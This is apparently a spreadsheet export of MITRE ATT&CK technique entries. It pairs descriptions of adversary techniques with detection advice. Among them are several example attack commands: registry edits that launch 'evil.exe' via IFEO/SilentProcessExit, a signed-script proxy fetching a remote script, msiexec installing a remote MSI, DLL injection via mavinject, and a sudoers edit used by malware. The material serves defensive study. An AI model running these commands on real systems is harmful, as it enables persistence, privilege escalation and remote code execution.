System-wide cron jobs are installed by modifying &lt;code&gt;/etc/crontab&lt;/code&gt; file, &lt;code&gt;/etc/cron.d/&lt;/code&gt; directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.
Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
### at
The at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.
### launchd
Each launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called &lt;code&gt;StartCalendarInterval&lt;/code&gt; with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.</t>
  </si>
  <si>
    <t>persistence,execution</t>
  </si>
  <si>
    <t>Sudo</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you 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</si>
  <si>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Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.</t>
  </si>
  <si>
    <t>Mshta</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</si>
  <si>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t>
  </si>
  <si>
    <t>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension &lt;code&gt;.hta&lt;/code&gt;. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: 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 (Citation: GitHub SubTee The List)</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and Relay</t>
  </si>
  <si>
    <t>Windows event logs,Windows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</si>
  <si>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</si>
  <si>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</si>
  <si>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Domain Fronting</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Packet capture</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</t>
  </si>
  <si>
    <t>Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: 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</si>
  <si>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Dynamic Data Exchange</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution. (Citation: NVisio Labs DDE Detection Oct 2017)
Monitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.
Monitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications.</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</si>
  <si>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may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>DLL monitoring,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor for change notifications to and from unfamiliar password filters.
Newly installed password filters will not take effect until after a system reboot.
Password filters will show up as an autorun and loaded DLL in lsass.exe. (Citation: Clymb3r Function Hook Passwords Sept 2013)</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</si>
  <si>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 (Citation: Carnal Ownage Password Filters Sept 2013)</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application. (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for influx of Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</t>
  </si>
  <si>
    <t>Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: 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 (Citation: Microsoft COM ACL) (Citation: Microsoft Process Wide Com Keys) (Citation: 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 (Citation: Enigma MMC20 COM Jan 2017) (Citation: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
DCOM may also expose functionalities that can be leveraged during other areas of the adversary chain of activity such as Privilege Escalation and Persistence. (Citation: ProjectZero File Write EoP Apr 2018)</t>
  </si>
  <si>
    <t>Browser Extensions</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser, to include credentials, (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control  (Citation: Chrome Extension C2 Malware).</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>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Utilize the Sysinternals Process Monitor utility to monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)</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</si>
  <si>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lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell Get-ADUser Cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015)
Monitor Account Management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015)  (Citation: Microsoft DsAddSidHistory)
Monitor Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>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</si>
  <si>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Hooking</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure. (Citation: Microsoft Hook Overview) (Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools  (Citation: Volatility Detecting Hooks Sept 2012) (Citation: PreKageo Winhook Jul 2011) (Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures. (Citation: Zairon Hooking Dec 2006) (Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors  (Citation: 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(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions. (Citation: StackExchange Hooks Jul 2012) (Citation: Adlice Software IAT Hooks Oct 2014)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</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</si>
  <si>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 (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055),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 (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)
Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)</t>
  </si>
  <si>
    <t>persistence,privilege-escalation,credential-access</t>
  </si>
  <si>
    <t>Screensaver</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</si>
  <si>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</si>
  <si>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&lt;code&gt;ScreenSaverTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: 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[Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: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</si>
  <si>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</si>
  <si>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</si>
  <si>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 CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for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RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)</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</si>
  <si>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&lt;code&gt;&lt;executable&gt;&lt;/code&gt;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IEFO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)
* &lt;code&gt;reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512&lt;/code&gt;
* &lt;code&gt;reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1&lt;/code&gt;
* &lt;code&gt;reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"&lt;/code&gt;
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.
Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</t>
  </si>
  <si>
    <t>privilege-escalation,persistence,defense-evasion</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)
[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process Doppelgänging</t>
  </si>
  <si>
    <t>Monitor and analyze calls to CreateTranscation, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory.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</si>
  <si>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leverage TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelgänging.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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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or reuse it for [Pass the Hash](https://attack.mitre.org/techniques/T1075).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</si>
  <si>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Multi-hop Proxy</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Drive-by Compromise</t>
  </si>
  <si>
    <t>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection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</si>
  <si>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</si>
  <si>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 drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation.
Multiple ways of delivering exploit code to a browser exist, including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames,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 (Citation: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t>
  </si>
  <si>
    <t>initial-access</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Packet capture,Web logs,Web application firewall logs,Application logs</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</si>
  <si>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</si>
  <si>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(Citation: NVD CVE-2016-6662), standard services (like SMB (Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. (Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities. (Citation: OWASP Top 10) (Citation: CWE top 25)</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Process use of network,Windows event logs</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</si>
  <si>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Control](https://attack.mitre.org/techniques/T1088)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</si>
  <si>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[Regsvr32](https://attack.mitre.org/techniques/T1117)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whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</t>
  </si>
  <si>
    <t>Windows,macOS,Linux</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</si>
  <si>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Execution](https://attack.mitre.org/techniques/T1204) occurs.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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and [Scripting](https://attack.mitre.org/techniques/T1064).</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Supply chain compromise is the manipulation of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</si>
  <si>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Control Panel Items</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Windows Registry,Windows event logs,Process command-line parameters,Process monitoring</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</si>
  <si>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[Rundll32](https://attack.mitre.org/techniques/T1085) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1085) command, which may bypass detections and/or execution filters for control.exe. (Citation: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 (Citation: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 (Citation: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 (Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t>Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>API monitoring,Packet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</si>
  <si>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</si>
  <si>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Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model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[PowerShell](https://attack.mitre.org/techniques/T1086)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allow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</si>
  <si>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SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Trusted Relationship</t>
  </si>
  <si>
    <t>Application logs,Authentication logs,Third-party application logs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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process command-line parameters,Process monitoring</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</si>
  <si>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</si>
  <si>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Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110).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(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
### Windows
* &lt;code&gt;net accounts&lt;/code&gt;
* &lt;code&gt;net accounts /domain&lt;/code&gt;
### Linux
* &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;
* &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;
### macOS
* &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt;</t>
  </si>
  <si>
    <t>Indirect Command Execution</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</si>
  <si>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</si>
  <si>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[Command-Line Interface](https://attack.mitre.org/techniques/T1059),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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Link](https://attack.mitre.org/techniques/T1192).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[Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194).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</si>
  <si>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</si>
  <si>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</si>
  <si>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and [Scripting](https://attack.mitre.org/techniques/T1064).</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via [Spearphishing Link](https://attack.mitre.org/techniques/T1192) that leads to exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</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</si>
  <si>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</si>
  <si>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defense-evasion,persistence,command-and-control</t>
  </si>
  <si>
    <t>Sudo Caching</t>
  </si>
  <si>
    <t>This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt; that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Adversaries can abuse poor configurations of this to escalate privileges without needing the user's password. &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. When &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user. 
The OSX Proton Malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt;  (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>DCShadow</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</si>
  <si>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</si>
  <si>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(Citation: BlueHat DCShadow Jan 2018) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). (Citation: BlueHat DCShadow Jan 2018)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</si>
  <si>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DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018)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 (Citation: BlueHat DCShadow Jan 2018)</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</si>
  <si>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</si>
  <si>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 (Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: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 (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)
Cracked hashes may enable Persistence, Privilege Escalation, and  Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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RegCreateKeyEx and RegSetValueEx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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Discovery](https://attack.mitre.org/techniques/T1063). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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(Citation: Technet MS14-068) (Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>Application logs,Authentication logs,Data loss prevention,Third-party application logs</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</si>
  <si>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</si>
  <si>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 Microsoft SharePoint
Found in many enterprise networks and often used to store and share significant amounts of documentation.
### Atlassian Confluence
Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. 
These are typically obtained through the operating systems package manager and installed like a normal package.
Adversaries will likely run these commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview)
On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt;
On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;
Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:&lt;code&gt;modprobe insmod lsmod rmmod modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs)
For macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and correlate with other unknown or suspicious activity.</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</si>
  <si>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Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)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Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: &lt;code&gt;cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png&lt;/code&gt;
There are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)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</si>
  <si>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</si>
  <si>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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086).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</si>
  <si>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Files](https://attack.mitre.org/techniques/T1081) associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</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</si>
  <si>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
### Msiexec.exe
Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)
* &lt;code&gt;msiexec.exe /q /i "C:\path\to\file.msi"&lt;/code&gt;
* &lt;code&gt;msiexec.exe /q /i http[:]//site[.]com/file.msi&lt;/code&gt;
* &lt;code&gt;msiexec.exe /y "C:\path\to\file.dll"&lt;/code&gt;
### Mavinject.exe
Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)
* &lt;code&gt;"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &amp;lt;PID&amp;gt; /INJECTRUNNING &amp;lt;PATH DLL&amp;gt;&lt;/code&gt;
* &lt;code&gt;C:\Windows\system32\mavinject.exe &amp;lt;PID&amp;gt; /INJECTRUNNING &amp;lt;PATH DLL&amp;gt;&lt;/code&gt;
### SyncAppvPublishingServer.exe
SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)
### Odbcconf.exe
Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
* &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;
Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Remote Access Tools</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</si>
  <si>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</si>
  <si>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Fronting](https://attack.mitre.org/techniques/T1172)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</si>
  <si>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 (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108)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</si>
  <si>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</si>
  <si>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</si>
  <si>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subTee WMIC XSL APR 2018)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</si>
  <si>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whitelisting defenses. Similar to [Trusted Developer Utilities](https://attack.mitre.org/techniques/T1127),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Command-line example: (Citation: Penetration Testing Lab MSXSL July 2017)
* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;
